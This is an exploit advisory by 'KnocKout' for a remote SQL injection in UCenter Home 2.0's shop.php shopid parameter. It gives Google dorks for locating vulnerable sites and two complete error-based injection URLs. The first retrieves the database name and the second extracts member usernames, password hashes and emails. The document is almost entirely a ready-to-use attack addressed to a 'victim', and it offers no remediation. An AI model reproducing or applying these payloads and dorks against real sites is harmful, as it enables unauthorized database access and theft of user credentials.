__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1